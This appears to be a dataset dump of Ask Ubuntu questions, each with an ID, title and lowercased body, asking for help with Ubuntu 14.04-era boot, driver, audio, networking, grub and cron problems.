469198	missing characters in evince	using document viewer ( evince ) v3.10.3 i have noticed that my documents appear to be missing letters periodically , particularly the combination 'fi ' . if this is present in a document , it appears as just a space . if i select the missing characters and paste them elsewhere , however , i can see that the 'fi ' is indeed present . very strange . has anyone seen something similar , and moreover , know how to fix it ? thanks .
469199	kernel 3.13.0.24 wo n't boot	i recently updated my ubuntu to 14.04 , which also resulted in the installation of kernel 3.13.0.24 booting this kernel always resulted in a black screen , so i simply got rid of it and am now using the old one ( 3.5.0-17 ) . to install an nvidia driver i need the linux-header ( kernel source ) for the running kernel , which is part of the 12.04 repositories , but not the 14.04 ones . does anyone know a solution for this problem - so either a fix for the new kernel or how i can install the headers ? by the way : i was not able to install/boot ubuntu 14.04 or any other newer linux distribution from dvd ; i had the same black screen problem . i am using an acer travelmate 8573 , if you need any other information please ask ! thank you !
469204	setting permanent mac address in ubuntu 14.04	due to the unusual way my isp set up internet , i need to manually set up mac address to go online . so far i 've been using : sudo ifconfig eth0 down sudo ifconfig eth0 hw ether xx : xx : xx : xx : xx : xx sudo ifconfig eth0 up however , i have to enter this command every time i start my computer . how to set mac address permanently ?
469205	how to make pulseaudio and ubuntu detect the same audio device as alsa driver	i use ubuntu 14.04 x64 and i use gnome-shell on my laptop . i have a bose companion 5 ( which is basically a usb sound system ) and a hdmi port , both does work perfectly when i just boot with the cable plugin . however , when my laptop go to sleep or get unplugged from those two outputs , if i plug back the device , i end up without any hardware detection ( only the built-in speakers ) from pulse and gnome-shell sound output selector while if i use alsamixer , the device look up and ready . gstreamer-properties allow me to select and test effectively any device but while alsa recognize any device on the run , pulse is not capable of handling things correctly , my question is then : how can i make pulse detect and use the same hardware as alsa , or how to remove completely and gracefully pulseaudio ( meaning volume applet running in gnome shell ) i do n't mind if the project implies to recompile half gnome shell if it implies those audio outputs work all the time . pulse does not list my soundcard when i use command pactl list cards while the module plug & play for sound card is loaded in pactl list modules . i really do n't know what to do , the behavior seems pretty random .
469208	disabling/altering bubble notifications in 12.04 for real	first off , i found the answer on this question and it does n't work for me : http : //askubuntu.com/questions/342183/disable-bubble-notifications-in-empathy-using-ubuntu-13-04 # = the notifications i seem to be getting are from my facebook contacts list , plus pidgin , when it 's running . any answers i can find on this ( including the above ) are about notifications generated by empathy , which i am not using for any kind of chat and which does not have my login information for any platform . i am presently logged out of facebook in every place i can find , yet it still seems to be finding these chat status messages for notifications . any help would be appreciated .
469209	how to resolve hostnames in chroot ?	i try to repair an broken ubunu 14.04 with chroot . what i did , is to boot ubuntu from usb mounted the original system that has to be repaired and changed to this system with chroot : sudo mount /dev/sdxy /mnt sudo mount -o bind /dev /mnt/dev sudo mount -o bind /sys /mnt/sys sudo mount -t proc /proc /mnt/proc sudo cp /proc/mounts /mnt/etc/mtab sudo chroot /mnt /bin/bash that worked fine , but in chroot environment i do n't have access to the internet , so apt is n't able to resolve hostnames . what am i supposed to do ? ping www.askubuntu.com does not work either .
469214	unable to play rubik 's cube game on google doodle in chrome for ubuntu	i 'm unable to play rubik 's cube game on google doodle in chrome for ubuntu . it says i need the lastest version of chrome to play , but i already updated everything and it still does n't work . what could i do to play it ?
469217	open file as other program	i want to configure firefox to open .zip files with file-roller . in the options , i browse to /usr/share/applications/file-roller.desktop and it doesnât open it as file roller however nautilus easily does that . its like that for every program . which folder can i find all the applications to open files with because this folder doesnât seem to work .
469218	wireless driver modification	i am currently working on wireless security . my goal is to protect the client from the deauth attack . for this purpose , i want to exchange some keys between the client and access point , and to manage the de authentication packet using that key . for this reason i need to modify the wireless driver . please help me know how i can modify the linux kernel step by step .
469219	can i install 64 bit ubuntu on my intel core i7 64bit pc ?	i 've an intel core i7 64 bit pc . i 've seen that ubuntu 14.04 lts has the following two versions.. ubuntu-14.04-desktop-i386.iso ( intel 32 bit ) ubuntu-14.04-desktop-amd64.iso ( amd 64 bit ) can i use ubuntu-14.04-desktop-amd64.iso to install ubuntu onto my intel 64 bit machine ? would i face any problem if i do this ? or should i install 32 bit version on my 64 bit pc ? but if i do this , i think i wo n't be able to get the advantages of having a 64 bit pc..right ? what should i do now ? please someone clear the fact ( difference ) of intel x86 and amd64 .
469223	boot issues when using boot-repair	i ran the recommended settings for the boot-repair tool when i was trying to link my windows 7 and ubuntu that were on separate drives . now my windows will not start as i get the error code 0xc0000098 . i noticed that there is within my boot folder in ubuntu , that there is an efi folder that contains a windows efi boot manager . how do i remove this so that i can use the boot manager that is still with my windows ?
469224	intel graphics causes `` speckles '' on screen	have just freshly installed ubuntu 14.04 , the screen is corrupted with 'speckles ' . screenshot below , full resolution here . graphics chipset is intel hd graphics 2500 windows 7 installation on same machine exhibits no problems , have tried different hdmi cables and dvi connection with no improvement . only solution so far is to completely remove the distribution-supplied intel drivers and use software rendering , though this is not satisfactory . libgl_debug=verbose glxinfo contains the following , which may or may not be relevant libgl : screen 0 does not appear to be dri3 capable libgl : pci id for fd 4 : 8086:0152 , driver i965 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so libgl : ca n't open configuration file /home/andrew/.drirc : no such file or directory . ... opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge desktop opengl core profile version string : 3.3 ( core profile ) mesa 10.1.0 x log is pretty verbose so have attached it here : xorg.0.log
469225	trusty : caffeine does n't appear in panel after update	there were a few ppa updates this morning , one of them was caffeine . it was working fine initially , it does show up in the start up applications list but does not show up in the panel . i tried removing it and installing it but that did n't do anything . i also figured it could have been my theme and icons , so i set it all to default to no avail . i think it is caffeine 2.7 , not sure if i was on 2.6 or what . it was an official trusty ppa . anyone getting this issue ? i also noticed that caffeine does function . i have my dim settings at 3 minutes , and when running a yt video in full screen it does not go to screen saver . and when left idle , it goes to screen saver .
469227	second hard drive -- detection , formatting and mounting	my ubuntu desktop has two hard drives , 1 gb ( primary , formatted ) and 500 mb ( unformatted , never mounted ) . if i try to detect the partition using the command cat /proc/partitions , the result is : major minor # blocks name 8 0 488386584 sda 8 1 454864896 sda1 8 2 1 sda2 8 5 33518592 sda5 8 16 976762584 sdb 8 17 943241216 sdb1 8 18 1 sdb2 8 21 33518592 sdb5 11 0 1048575 sr0 which exactly is the 500 gb second hard drive and how could i format it so that it mounts automatically at boot time ? thanks
469228	touchpad does not stay disabled	is there a way to keep my touchpad disabled ? i have a thinkpad e420s . i have disabled the touchpad because the built in buttons are too hard to click without moving the cursor . i just use the red nubbin on the keyboard aand upper bottons instead . for some reason the touchpad keeps getting enabled forcing me to go back to system settings - > mouse & touchpad - > to set the touchpad to off . i am not sure how to reliably reproduce this . it usually stays after a shutdown , or use of guest session but then sometimes it just appears on .
469241	domain name in dhcp	i want to configure dhcp on 14.04 . so i downloaded isc-dhcp-server from the repository . in configuration file i see these two line which are not commented . what is the usage/purpose of the following configuration directives ? option domain-name `` example.org '' ; option domain-name-servers ns1.example.org , ns2.example.org ;
469242	unable to install 14.04 lts using usb	my system configs are mentioned below , processor : pentium 4 ( 2.4 ghz ) ram : 2gb memory : 40 gb motherboard : intel 915 os installed : ubuntu 6.04 dapper lts i have downloaded 14.04 lts ( intel less then 2 gb version ) with boot in usb stick but when it reaches to boot from usb stick , it printed a message saying that boot is ok . but after that it wo n't go further , i want to know couple of things here . is there any way to upgrade 6.04 to 14.04 from usb ? is there any compatibility issue with my hardware ? i have tried to update through command line but see the below terminal command outputs . please let me know aleast a solution to get rid of this old 6.04 lts . from terminal snapshot : initializing package states ... done building tag database ... done no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 0b will be used . ashish @ ashish-desktop : ~ $ sudo aptitude reinstall ubuntu-desktop reading package lists ... done building dependency tree ... done initializing package states ... done building tag database ... done the following packages will be reinstalled : ubuntu-desktop 0 packages upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 0b will be used . writing extended state information ... error ! e : i was n't able to locate file for the ubuntu-desktop package . this might mean you need to manually fix this package . e : could n't lock list directory..are you root ? ashish @ ashish-desktop : ~ $ sudo do-release-upgrade sudo : do-release-upgrade : command not found ashish @ ashish-desktop : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 6.06.1 lts release : 6.06 codename : dapper
469243	help repairing a 14.04 ( upgrade from 13.10 ) system installation ?	i installed 14.04 by upgrading from 13.10 . i 've have a few issues , but nothing preventing me from working . today , i started having problems with my headset - it no longer showed up in my device listings , and although i could control volume settings from the headset controls , no sound was sent to the headset and the headset 's mic was not recognized . i tried to update the alsa-utils but no update was available although apt-get did mark it for manual processing ( thanks ) in the future , then i r & r 'd pulse audio packages and that 's when everything went south . on reboot , i lost a crapton of stuffs - in my system settings window , i now only have language support , security & privacy , printers , landscape service , and software & updates . everything else is gone . i removed the pulse-audio packages i installed previously and rebooted but no change . i updated the available packages with apt-get and rebooted - no change . since i upgraded from 13.10 , i never created an install disk . is there a command or set of commands that can validate the 14.04 base install and reload w/e packages went missing without having to do a complete re-install from media and losing all my files ? thanks ...
469246	how to debug initramfs scripts ?	for my ubuntu 14.04 setup , i have 4 luks partitions that work as backing block devices form my btrfs root partition . using the default settings i could not get the 4 encrypted partitions unlocked at boot time , so i wrote a script that would do that for me . the script sort of works , sometimes when i boot i have no issues , other times , it boots into the initramfs prompt . i think there are timing issues between unencrypting the luks partitions , then assembling the btrfs partition and then mounting the root subvol , but i have no idea how to debug/test/fix this . any ideas of what could i do to figure out what is the problem ?
469250	how can i install google hangout ?	i just started running ubuntu 14.04 ( 32-bit ) . i logged into google+ and went to there page to download the hangout plug-in . it would download , but any time i tried to open the installer with the ubuntu software center , i would just take me to the home page and wo n't install anything . any suggestions ?
469252	remove programs from open with other application menu	wine placed about 18 useless apps ( most of them just repeat ) into the open with other application menu and they bother me because they are useless and interfere with the quick open with menu . how do i remove the applications from there ?
469259	downgrade java 1.7 to java 1.5	i am now on ubuntu 14.04 , and my java version is java version `` 1.7.0_55 '' . how can i remove 1.7 and install java 1.5 . i tried several tutorials , but they are old and none of them worked for me .
469261	weird noise and sound not working that good	i have a weird problem , when there is completely no sound and after that sound starts again i have a weird noise at the start of or just whit a notification or what ever has to use sound , also i have keyboard controls for sound and sometimes if i press volume op or down it just does n't react ... if i reboot it just is back normal again ... i have tried to search for drivers but that did n't help . can somebody solve my problem ? thanks a lot : ) i 'm running 14.04 lts i have a hp pavilion dm1 dual-boot whit windows
469266	during decryption of home folder my d drive was mounted , and i ran rm -rf command it deleted all my d drive data . how to recover ?	i followed this tutorial to disable encryption . at that time my d-drive ( a partition ) was mounted . then according to tutorial i ran sudo rm -rf command it deleted all my mounted drive data also . how can i recover all my data ? i have just copied my important files to that drive from ubuntu before deleting my home folder . i have ubuntu 14.04 installed alongside windows in my d-drive . [ edit ] now as d-drive is cleared ( and ubuntu was installed on that drive ) i am getting boot error as file : boot\bcd and ca n't boot even in windows . now i dont need my d-drive data just boot to windows
469267	error in decrypting wep-encrypted .pcap file	i got a pcap file containing captured wep packets , and a wep key to decrypt it . i tried using both wireshark and airdecap-ng to decrypt the packet . the key is correct , so the decryption was done successfully , but the decrypted packets were wrong - some bytes were not what it should be , and they became malformed packets . i have tried to replicate this on other machines , but all of them can decrypt the packets correctly . i guess it causes by some library packages in my machine to make the wep decryption goes wrong . i might need to re-install some of them , but i do n't know which one . please help . my machine is running ubuntu 14.04 , wireshark ( 1.10.6-1 ) , libssl1.0 ( 1.0.1f-1ubuntu2.1 ) , libgcrypt11 ( 1.5.3-2ubuntu4 )
469270	ubuntu is n't installing , or doing anything	i burned ubuntu 12.04 to a dvd and restarted my computer with the dvd inserted . for two hours now i 've had a purple screen come up with `` ubuntu '' on it and 5 dots signifying that it 's installing something . however literally nothing has happened -- i ca n't click on any options and the installation has n't made any progress . what to do ? to add : i 'm completely new to this and would really like some help
469272	two subnets on one interface	so im trying to configure a zoneminder video server that connects to ip cameras on the lan but i would like the cameras to be on a different subnet as our office and im not sure how to accomplish that via static routes . it seems that most of the other questions are based on having to subnets that each have a router with gateway . what im trying to do is have eth0 connect to 192.168.1.0 and have the cameras be in 192.168.2.0 but be accessible by the server without needed any additional network devices . any ideas ?
469273	“psmouse.ko ' not found” installing alps touchpad in a lenovo ideapad flex 14	i was following this instructions with ubuntu 14.04. https : //github.com/he1per/psmouse-dkms-alpsv7 and psmouse serio1 : alps : unknown alps touchpad in a lenovo ideapad flex 15 and after many tries i received the following error message : root @ alisson-lenovo-ideapad-flex14 : /tmp/psmouse-dkms-alpsv7 # ./install.sh ────── building with dkms ─────── error ! dkms tree already contains : psmouse-dkms-alpsv7-1.0 you can not add the same module/version combo more than once . module psmouse-dkms-alpsv7/1.0 already built for kernel 3.13.0-24-generic/4 ────── installing with dkms ─────── module psmouse-dkms-alpsv7/1.0 already installed on kernel 3.13.0-24-generic/x86_64 ▶▶▶▶ error : dkms install failed : \n '/usr/lib/modules/3.13.0-24-generic//updates/psmouse.ko ' not found . root @ alisson-lenovo-ideapad-flex14 : /tmp/psmouse-dkms-alpsv7 # than , searching for `` psmouse.ko '' : alisson @ alisson-lenovo-ideapad-flex14 : ~ $ locate psmouse.ko /lib/modules/3.13.0-24-generic/kernel/drivers/input/mouse/psmouse.ko /lib/modules/3.13.0-24-generic/updates/dkms/psmouse.ko /var/lib/dkms/psmouse-dkms-alpsv7/1.0/3.13.0-24-generic/x86_64/module/psmouse.ko /var/lib/dkms/psmouse-dkms-alpsv7/1.0/build/src/.psmouse.ko.cmd /var/lib/dkms/psmouse-dkms-alpsv7/1.0/build/src/psmouse.ko alisson @ alisson-lenovo-ideapad-flex14 : ~ $ what should i do ?
469274	how do i use the microphone and speaker of my phone as native ubuntu devices ?	the google voice 'trick ' i was using on my nexus 4 recently became unavailable . due to poor reception and no landline i could do with getting google voice working somehow . hence ... i would like to use google voice on my computer and route the sound/microphone to my phone over bluetooth or the normal wifi . surely there must be an app for that ?
469285	preferences / display preferences missing in gnome 3.12	i just installed gnome 3.12 on ubuntu 14.04 via the standard ppa . it appears that the display preferences and preferences applications are either missing , or missing from the application search menu . how do i change my screen configuration and other preferences in gnome 3.12 ? alternatively , how do i launch the display preferences and preferences applications ? i do n't know of any applications in bin that correspond to these apps ?
469287	how do i record internet radio stream from banshee 2.6.2 ?	i do n't have stream-recorder in available plugins . where can i get it ? there is similar question , but solution does n't work any more . i have banshee installed from default repository , it 's 2.6.2 .
469289	how to update wireless-regdb in ubuntu12.04 ?	my wifiac nic card is running in 40mhz channel ( expect 80/160 mhz ) , i need to update my wireless-regdb in my ubuntu 12.04 , anybody did this ? and how ? thanks
469290	white screen on mac mini on startup	i have no idea where to start with this problem . i dual booted my mac mini with ubuntu 13.10 by installing refit . it worked awesome . my only problem was not being able to reboot but it did n't bother me . i only say this because i 'm wondering if that had part of a role in this problem . i updated ubuntu to 14.14 a couple weeks ago and i shut it down when i booted up i got the mac `` bootup song '' and blank white screen where refit menu was suppose to start . then it just sits there frozen . i tried manually shutting down and booting up again but same thing . i think something about the update on ubuntu deleted refit . is there a way i can wipe the mac myself and possibly ? i have everything backed up so i 'm not really worried about the information . is there a way to reinstall refit when i ca n't get into any os ?
469291	shutting down automatically	help wanted i am using windows 8.1 and ubuntu 14.4 , while watching videos my ubuntu is shutting down automatically i am having trouble with face-book videos , yahoo videos but you-tube is playing fine . someone help fix it . jos
469292	reinstalling all installed debs with a command	is there a way to reinstall all installed ( .deb ) packages with a terminal command . i think some package is corrupted ( i do n't know which ) and i do n't want to reinstall the os ( which will need a lot of energy and time to recusotomize ) .
469301	ubuntu 14.04 rdp hell	ok - i am a linux/ubuntu noob.. i had a old pc that not enough grunt for windows so decided go ubuntu wanted just use it as a server - so no key/mouse/screen.. but with the desktop version . plan was/is to rdp into it from my windows machine and do what i need to do.. that was the plan : / installed ubuntu : ) .. installed xrdp.. and was able connect.. but no desktop.. looks like a host of issues from people with gnome.. gnome-fallback ... gnome-flasback ... 2d desktops.. so i install xfce.. and am now able to rdp in and get a desktop ( which does not have all the features.. so i install gnome management tools ) .. anyway - my problem ... i can log in and i had admin rights.. and can do what i want on the main machine.. when i log i to same account via rdp.. the account seems to say it had admin access but when i try install something.. it errors out saying i do n't have permission . as i say - when i look at the user account tool - it says i am admin.. and if i do `` groups '' in consol it confirms i am is sudo and adm groups.. any idea what could be wrong please ? ( and go easy on me.. first day with linux ... ) thanks in advance and best regards
469302	what happens if you use your windows partition as a swap ?	recently , i installed ubuntu 14.04 and i accidentally set my windows 7 partition as a `` swap '' during my installation . now when i boot my computer up , i ca n't access the windows boot . i 'm wondering what happened to it . is there any way to reverse this ?
469306	can not not get impi after installing 14.4 maas . can not power on servers	i am not getting any impi after installing ubuntu 14.4 lts maas , during enlistment/commissioning of my servers . it was functioning in 12.4 but is not detecting it in or setting it 14.4. dell poweredge 1950 gen 3. maas can not power servers on i get the drop down menu with the options , but it does not set it automatically during enlistments/commissioning . for anyone wondering , impi is how maas/juju powers on physical servers ,
469307	how to connect to a wireless network in lubuntu	i just do n't know how to turn on my wi-fi or choose a wi-fi connection . i 'm now using the cable , but i really need to use the wi-fi on school . how to do that ?
469308	how can i get startup disk creator to not prompt for password when installing the bootloader on a usb drive ?	i use startup disk creator quite a lot and i find it quite annoying to have to enter my password near the end of the process for the bootloader to be installed . if i do n't see the prompt quick enough then i have to start the process all over . how can i get this password prompt to stop ? i know it is a security measure , but what am really risking by turning that one prompt off ?
469309	dictate window theme & background image on lubuntu	i 'm using the most recent lubuntu ( 14.04 ) distribution to setup a pc with an `` manager '' account with enhanced permissions and a normal user account . now i want to dictate the theme and desktop background image to the user account and do not allow him to make any change to this settings . is this possible ? i did n't found any documents on this topic . if it 's possible ( and it should be ) : where do i find further information ?
469310	how to plug a custom scope in the dash	i have followed the tutorial for creating a scope found here http : //developer.ubuntu.com/scopes/tutorials/unity-8-scope-example-openclipart/ i managed to modify the code and have the scope retrieve artist metadata from the spotify web api . i can load the scope and i get the window with the scope and a few controls . now i was wondering if it 's possible to use the scope i have created to show results in the desktop dash ? is this possible at all ? or the scope is supposed to work only with unity 8 and so i ca n't use it on a trusty desktop install ?
469311	virtualbox , ubuntu clients , internal network proxy to supply internet	probably this question was asked many times , but i seem to be unable to find proper solution . here is my setup : two virtual machines ( ubuntu 12.04 ) m1 and m2 . m1 has 2 network adapters : eth0 set to nat and eth1 set as internal network in virtualbox . m2 has 1 network adapter , setup as internal network in virtualbox . i want to setup m1 as proxy ( using iptables ) , so that m2 has internet access . here are some more details : m1 configuration : iptables rules : iptables -a forward -o eth0 -i eth1 -s 192.168.10.0/24 -m conntrack -- ctstate new -j accept iptables -a forward -m conntrack -- ctstate established , related -j accept iptables -a postrouting -t nat -j masquerade iptables -t nat -a prerouting -i eth1 -s 192.168.10.0/24 -p tcp -- dport 80 -j redirect -- to-port 8080 iptables -t nat -i prerouting 1 -i eth1 -s 192.168.10.150 -p tcp -m tcp -- dport 80 -j accept interfaces configuration : auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.10.125 netmask 255.255.255.0 broadcast 192.168.1.255 m2 configuration : interfaces configuration : auto eth0 iface eth0 inet static address 192.168.10.150 netmask 255.255.255.0 broadcast 192.168.1.255 kernel ip routing table : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.10.125 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0
469316	using grive to backup links to large folder	i have a folder that contains 2 gig of photos for shotwell that i want to backup using grive . i created a link to the folder and moved the link to the google drive folder . when i run sync now , it processes for about 15 seconds , deletes the link entry from the google drive folder and says synchronization is complete . no data is uploaded to googledrive.com . i have tested this procedure with a small folder and it works fine but fails on the large folder . shotwell ca n't find its source photos if i move this folder to google drive folder . is there a way to direct shotwell to the photo folder in the google drive folder ? i am using ubuntu 14.04 . i would appreciate any help on this problem .
469318	upstart sub-command tab completion with zsh	i 've just recently switched to zshell , and am loving it so far . one issue i 'm having however is that my init.d or upstart scripts used to have tab completion for their subcommands , but now it does n't . the most common commands like start , stop , status complete fine , but custom sub commands specific to that script are n't being picked up in zsh tab completion , where they were in bash . thanks for the help .
469321	ubuntu 14.04lts after updates ca n't boot	my desktop has the following os installed on each of the harddrive : windows xp pro ubuntu 12.04 lts ubuntu 14.04 lts linux mint 10 julia 1 is sata drive ; 2,3 and 4 are scsi drives . it has been working fine but last night wheni ran updates in 14.04 , i saw some changes done in grub . reboot could n't pass the cursor , grub could n't start . i used disk repair and the auto repair process showed success . but grub still could n't boot . i even tried installing kubuntu over linux mint , hoping the newly installed grub would pick up the other os but failed . what is next ? thanks for any help !
469322	getting `` mkdir : can not create directory ... '' while installing & using nvm/node.js commands	please bare with me , not a linux wiz ( unfortunately ) . anyways , i have a freshly installed 14.04 lts version of linux , onto which i recently installed nvm & node.js . i did so by entering the next two commands into my terminal following these instructions . curl https : //raw.githubusercontent.com/creationix/nvm/v0.7.0/install.sh | sh nvm install 0.10 awesome , i have nvm & node installed ! running commands like nvm ls provides me with a listing of versions that have been installed and so on ... so ? well , the problem is that after restarting my computer/logging out.. i 'm getting : ricardo : ~ $ nvm ls sbin mkdir : can not create directory â/usr/sbin/aliasâ : permission denied i 'm getting similar messages with other commands , for example : ricardo : ~ $ nvm use 0.10 n/a version is not installed yet ricardo : ~ $ nvm deactivate could not find /usr/sbin/*/bin in $ path could not find /usr/sbin/*/share/man in $ manpath could not find /usr/sbin/*/lib/node_modules in $ node_path when i go into my ~/.nvm/ directory , i see that the version of node i had installed is still present , how can i fix this ? : ` (
469324	do i need a swap partition for every linux distribution ?	to install various linux distributions on the same physical machine , do i need to add a swap partition for each distribution , or one will suffice for all ?
469325	what is autopoint ?	i need to install autopoint . i tried by using sudo apt-get install autopoint but it says e : unable to locate package autopoint . i am new to ubuntu , i am using ubuntu 10.04 lts lucid lynx .
469329	only one workspace in gnome-shell 3.10.4	my gnome-shell seems to have only one workspace . i can not switch to another workspace by using the ctrl+alt+down/up combination and using the super key always shows me one workspace only . if i attempt to open a program in a new workspace using the middle mousebutton i can observe there being 2 workspaces briefly but then the program gets moved to the upper one and the second one disappears . i have already tried to use static workspaces using gnome-tweak-tool . this gives me multiple workspaces , but they all show the exact same content . they are not independent from eachother . furthermore i have found executing compiz -- replace gnome-shell -- replace gives me a gnome-shell with working workspaces . edit : actually the workspace feature just disappeared as i opened a program . so scrap the part about it working .
469331	extracting all pdf links from multiple websites	glutanimate posted a script that extracts all pdf links from a single page . any idea on how to change this so the script can grab all the pdf links from a list of urls ?
469332	java applet `` your security settings have blocked an untrusted application from running '' after setting security settings to medium	i am trying to run an applet i created on 14.04 but it keeps getting blocked . i opened the control panel and added my applet file to the exception list and set the security to medium . i have multiple versions of java installed , java-7 and java-8 from oracle , and openjdk-7 . when i open any of the control panels the settings are always the same , so that should n't be the problem .
469333	add show desktop to menu bar ?	i would like to add a show desktop button to the title bar ( the bar at the top of the screen ) . i already know how to add a show desktop button to the launcher , but not the title bar . i would put an image if i had enough reputation .
469334	why are some apps like gmusicbrowser and lightlocker in japanese instead of my computer 's spanish in xubuntu ?	i have a problem with some xubuntu apps like gmusicbrowser in which they appear all in japanese and i do n't know how to fix it to show them up in native spanish . could somebody help me in that ?
469339	sublime text interface looks blurred	suddenly my sublime text editor started to looks blurred . the screenshot talks by itself . no other program fails like this , just sublime text . someone recognizes this painful behavior ?
469341	ubuntu 14.04 mouse pointing problem	i have a problem with mouses on my two computers . i will try to describe that issue : when i point some tab in google chrome and try to click , it clics a little below ... i need to resize google chrome window and it works for a while . second issue is sometimes i ca n't click on folders on the left corner of desktop . the others folders are ok ... any advices ? regards
469343	virtualbox doesnt recognize automonted partition	i have image of virtual win7_64 on a data partition which does n't mount automatically , so.. not to open it manually every time before i run virtualbox i did : http : //askubuntu.com/a/165462/258828 after restarting i can see this tiny pause-play sign next to my data partition but , when i run virtualbox it cant find the image . even if i do what have worked beforehand ( opening and closing partition folder ) it ca n't see it . what happens here ?
469344	browsing a different ubuntu installation drive : ca n't find my home folder	a few days ago i had a problem with the main computer that had my ubuntu installation . some hardware died on me and i just decided to replace the whole thing since it is old . ( the hard drive is fine ) . so i took out the ubuntu hard drive , and then i connected it to another computer that is also running ubuntu . i am exploring the old ubuntu drive with the new one , but i ca n't seem to find my old files at all . the new computer sees the old ubuntu drive fine , but when i access it 's home directory , nothing is inside . when i do sudo ls -la , terminal says `` total 8 '' , but it does n't list any actual directories there . i 'd appreciate if anyone helped me recover my ubuntu home folder .
469346	forgotten admin password in ubuntu 13.10	i am using a packard bell laptop running ubuntu 13.10 . i can not for the life of me remember the admin password , i have tried going down the grub route studiously following given directions but do not get the prompt to enter new password , instead i get a load of options none of which seem to apply to me . i 've tried every password i can think i might have used but none of them work.am i missing something ?
469347	how to hide grub menu in ubuntu 14.04	i have two operating systems : windows 8.1 and ubuntu 14.04 . i want to hide grub menu . i 'm using grub 2.02~beta2-9 . i tried following combinations of /etc/default/grub # grub_hidden_timeout=1 # grub_hidden_timeout_quiet=true grub_timeout=0 grub menu is visible for 10 seconds ( if timeout is set for value larger than 0 it is displayed correctly : grub_timeout=5 - 5 seconds delay ) grub_hidden_timeout=1 grub_hidden_timeout_quiet=true grub_timeout=0 grub menu is visible , i also tried grub_hidden_timeout=false and setting both grub_timeout and grub_hidden_timeout to zero and non-zero values # grub_hidden_timeout=1 # grub_hidden_timeout_quiet=true grub_timeout=1 grub_timeout_style=hidden grub menu is visible for 1 second , tried also grub_timeout_style=countdown with the same result , if grub_timeout is set to 0 , 10 seconds delay after each change i type update-grub and restart computer to see the results . according to grub documentation found in info -f grub -n 'simple configuration ' second way is depricated . the rightous way is the third one - by using grub_timeout_style , but unfortunately it does n't work . it 's probably some kind of a bug .
469349	touchpad track speed increases in dual monitor setup	i have a dell e6530 with an alps touchpad , nvidia nvs 5200 with proprietary nvidia-319.32 video driver installed . i am using xfce4 although i do not know if this makes a difference , as it seems to be a configuration unrelated to the de/wm . the touchpad driver in 3.11.0-12-generic works flawlessly on the laptop by itself . nvidia-319 works flawlessly and significantly better than noveau . however when i plug in an external display and extend to that monitor , my touchpad track speed increases dramatically , and it becomes very hard to make precise mouse movements , especially when moving the cursor relatively long distances , due to the cursor acceleration . it seems to increase the speed proportional to the net increase in total resolution available in the dual monitor setup . which would seem that the track speed is based on some sort of display resolution percentage , not number of pixels like i had expected . does anyone know if this is indeed how the touchpad configuration works ? and if there is a way to prevent this , or do i need to go in and decrease my track speed by about half every time i plug in an external monitor ?
469350	anacron not working	i have a clean install of xubuntu 14.04 32-bit , and anacron does n't seem to be working . i read that it 's better to use a cron job to trim ssds , and that ubuntu has a cron job to do that , so i removed discard from /etc/fstab . i wanted to confirm that the cron job was working , so i added an echo command to /etc/cron.weekly/fstrim so that it looks like this : # ! /bin/sh # call fstrim-all to trim all mounted file systems which support it echo `` trim started on '' $ ( date ) > > /home/dominic/desktop/trim_runs set -e # this only runs on intel and samsung ssds by default , as some ssds with faulty # firmware may encounter data loss problems when running fstrim under high i/o # load ( e. g. https : //launchpad.net/bugs/1259829 ) . you can append the # -- no-model-check option here to disable the vendor check and run fstrim on # all ssd drives . exec fstrim-all it runs fine from a terminal , but it never runs as a weekly job . so i moved it to cron.daily , but it never runs from there either . so i moved it to cron.hourly , and it does run every hour . the echo text appears in the file , and the drive light comes on for about two minutes . but cron.hourly does not use anacron . here is my crontab file . i have changed some of the times , but it did n't seem to work with the original times that came with xubuntu either . # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 16 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 1 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # i tested to see if it would run correctly from my user 's crontab by putting the following into crontab -e. then i waited a few minutes until 8:10 pm , but nothing happened . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin 10 20 * * * test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) i think it must have the correct syntax for run-parts , because it does run when i move the script into cron.hourly . it seems that cron is working but anacron is not . so my question is , what can i do to get anacron working ?
469351	ca n't boot into xubuntu 14.04 after removing extra hd	i had a pretty lazy setup prior to removing the hard drive ... . i had an 80gb hard drive with my xubuntu install , and then another 80gb hard drive that i used to test debian on . i did n't like debian , but kept it anyways and lazily kept my default boot device to the debian hd , where i would select booting into xubuntu . both hd 's have grub on them . but now , after removing the hd with debian on it , when i try to boot into xubuntu , i get the loading splash screen as normal , but after loading for 10-15 secs i get a black screen rather than my anticipated login screen . it is n't a issue with grub , as i just `` refreshed '' it in the recovery mode . does anyone have any suggestions ?
469353	video generator for any audio	i have some audio files . i want to make them available as youtube videos . but i do not want a static image , like an album cover , appearing all the time . i want some `` moving fractal images '' video style ( but in fact it could be any other `` style '' ) . some media players have this visualization tool . but what i want is to have the video file ( with the audio ) to upload to youtube . how can i achieve this ? which program ( s ) should i use ? or which commands to type in the command line ?
